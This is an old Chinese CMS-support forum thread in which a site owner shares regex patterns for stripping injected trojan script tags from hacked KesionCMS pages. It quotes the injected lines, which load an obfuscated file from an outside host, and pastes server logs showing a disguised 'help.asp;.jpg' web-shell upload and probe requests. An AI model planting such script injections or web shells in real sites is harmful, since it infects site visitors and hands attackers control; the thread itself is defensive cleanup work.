账号通
    

账号  

密码  

8974

查看

28

回复
主题:三分钟清除您网站中木马的页面,正则朋友请看 [收藏主题] 本贴被认定为精华 转到:  
abc1988 当前离线

195

主题

0

广播

5

粉丝
添加关注
级别:一年级

用户积分:3004 分
登录次数:313 次
注册时间:2007/11/10
最后登录:2011/6/13
abc1988 发表于:2009/9/15 16:39:00   | 显示全部帖子 查看该作者主题 楼主 
科汛智能建站系统

<script src="http://www.icxxw.com/ima%67es/lo%67o.swf" type="text/javascript" language="JavaScript" id="seraph5script9727"  ></script>



删除所有script或iframe开头的有效,正确的正则:


<(script|iframe) +[^>]*www.icxxw.com[^>]*>[^<]*</\1>


或者更快捷全面的是:


<(script|iframe) +[^>]*seraph[^>]*>[^<]*</\1>



*后面改成你想要包含的字符,这样就已经清除了.asp,.html,.html的木马了


 


剩下的就是.js文件了
那么删除所有
document.writeln('<script language="JavaScript" src="http://www.icxxw.co%6D/i%6Dages/logo.swf" type="text/javascript" id="seraph6script7639"  ><\/script>');


这个正确的正则应该是:
???
请官方或能人回答这个表达式,谢谢


 


也就是前后多了:document.writeln('和');


若能突破,将会是最快的清除现在科讯中马的页面的方法!


 


 


 


 


 


 


 


 


最终解决方法如下:三分钟搞定


 


 


 


ultraedit在文件中替换,选ultraedit正则:


 


搜搜索文档类型:*.asp;*.htm;*.html;*.js;


 


 


第一正则:document.writeln('<script*seraph*><\/script>');


 


 


第二正则:<script*seraph*></script>


 


2个按钮中马页面统统恢复,不用谢我,好东西一起分享!


 


 


 

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
abc1988 当前离线

195

主题

0

广播

5

粉丝
添加关注
级别:一年级

用户积分:3004 分
登录次数:313 次
注册时间:2007/11/10
最后登录:2011/6/13
abc1988 发表于:2009/9/15 19:22:00   | 显示全部帖子 查看该作者主题 沙发 
科汛在线商城系统(NET)

ultraedit在文件中替换,选ultraedit正则:

 

搜搜索文档类型:*.asp;*.htm;*.html;*.js;

 

 

第一正则:document.writeln('<script*seraph*><\/script>');

 

 

第二正则:<script*seraph*></script>

 

2个按钮中马页面统统恢复,不用谢我,好东西一起分享!

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
abc1988 当前离线

195

主题

0

广播

5

粉丝
添加关注
级别:一年级

用户积分:3004 分
登录次数:313 次
注册时间:2007/11/10
最后登录:2011/6/13
abc1988 发表于:2009/9/16 17:41:00   | 显示全部帖子 查看该作者主题 藤椅 
做在线知识付费 选科汛云开店

2009-09-16 07:51:03 W3SVC2111342725 212.184.32.19 POST /cla/Images/Pannel/help.asp;.jpg - 80 - 58.61.36.103 - 404 0 2


jbywmanage


2009-09-15 15:00:55 W3SVC1494564086 212.184.32.19 GET /fqvxservusu.asp - 80 - 125.64.220.102 Mozilla/4.0 301 0 64
2009-09-15 15:00:55 W3SVC1494564086 212.184.32.19 GET /puzbsu.asp - 80 - 125.64.220.102 Mozilla/4.0 301 0 64
2009-09-15 15:00:55 W3SVC1494564086 212.184.32.19 GET /lqapservu.asp - 80 - 125.64.220.102 Mozilla/4.0 301 0 64
2009-09-15 15:00:55 W3SVC1494564086 212.184.32.19 GET /bbs/ikwaservu.asp - 80 - 125.64.220.102 Mozilla/4.0 301 0 64
2009-09-15 15:00:55 W3SVC1494564086 212.184.32.19 GET /jhykservu.aspx - 80 - 125.64.220.102 Mozilla/4.0 301 0 64
2009-09-15 15:00:55 W3SVC1494564086 212.184.32.19 GET /bbs/kzeyservu.aspx - 80 - 125.64.220.102 Mozilla/4.0 301 0 64
2009-09-15 15:00:56 W3SVC1494564086 212.184.32.19 GET /nlpfservu.php - 80 - 125.64.220.102 Mozilla/4.0 301 0 64
2009-09-15 15:00:56 W3SVC1494564086 212.184.32.19 GET /bbs/pgiyservu.php - 80 - 125.64.220.102 Mozilla/4.0 301 0 64

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
abc1988 当前离线

195

主题

0

广播

5

粉丝
添加关注
级别:一年级

用户积分:3004 分
登录次数:313 次
注册时间:2007/11/10
最后登录:2011/6/13
abc1988 发表于:2009/9/16 17:14:00   | 显示全部帖子 查看该作者主题 板凳 
做在线知识付费 选科汛云开店
help.asp.jpg删除了又有,而且不是在uploadfiles目录,是很多目录都有,最少4个目录
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
abc1988 当前离线

195

主题

0

广播

5

粉丝
添加关注
级别:一年级

用户积分:3004 分
登录次数:313 次
注册时间:2007/11/10
最后登录:2011/6/13
abc1988 发表于:2009/9/16 17:07:00   | 显示全部帖子 查看该作者主题 报纸 
做在线知识付费 选科汛云开店
后门文件在哪里?请知道的朋友互相告知!谢谢
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
abc1988 当前离线

195

主题

0

广播

5

粉丝
添加关注
级别:一年级

用户积分:3004 分
登录次数:313 次
注册时间:2007/11/10
最后登录:2011/6/13
abc1988 发表于:2009/9/15 23:26:00   | 显示全部帖子 查看该作者主题 地板 
做在线知识付费 选科汛云开店
ultraedit在文件中替换,选ultraedit正则: 搜搜索文档类型:*.asp;*.htm;*.html;*.js; 第一正则:document.writeln('<\/script>'); 第二正则: 2个按钮中马页面统统恢复,不用谢我,好东西一起分享! 用这个吧,不要用开始的
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
abc1988 当前离线

195

主题

0

广播

5

粉丝
添加关注
级别:一年级

用户积分:3004 分
登录次数:313 次
注册时间:2007/11/10
最后登录:2011/6/13
abc1988 发表于:2009/9/15 20:56:00   | 显示全部帖子 查看该作者主题 7楼 
科汛智能建站系统
如果能远程服务器,就直接在服务器运行,如果不行,就下载文件回来本地运行。需要下ultraedit32,你下载就知道。点搜索,点在文件中替换,点高级,打勾正则,使用utraledit正则,选择好目录,包含子目录,输入上面的正则表达式。2次操作就OK了。
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
abc1988 当前离线

195

主题

0

广播

5

粉丝
添加关注
级别:一年级

用户积分:3004 分
登录次数:313 次
注册时间:2007/11/10
最后登录:2011/6/13
abc1988 发表于:2009/9/15 19:31:00   | 显示全部帖子 查看该作者主题 8楼 
科汛在线考试系统(NET)
虽然可以清除页面代码,但是还是没有最终找到木马执行文件asp的下落,希望官方或知道的朋友互相告知!
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
abc1988 当前离线

195

主题

0

广播

5

粉丝
添加关注
级别:一年级

用户积分:3004 分
登录次数:313 次
注册时间:2007/11/10
最后登录:2011/6/13
abc1988 发表于:2009/9/15 19:19:00   | 显示全部帖子 查看该作者主题 9楼 
做在线知识付费 选科汛云开店
按2次按钮,全部木马页面统统删除中马代码段,爽!
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
abc1988 当前离线

195

主题

0

广播

5

粉丝
添加关注
级别:一年级

用户积分:3004 分
登录次数:313 次
注册时间:2007/11/10
最后登录:2011/6/13
abc1988 发表于:2009/9/15 19:17:00   | 显示全部帖子 查看该作者主题 10楼 
科汛在线网校系统
JS文件也搞定了,用ultraedit32
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.21875秒 powered by KesionCMS 9.0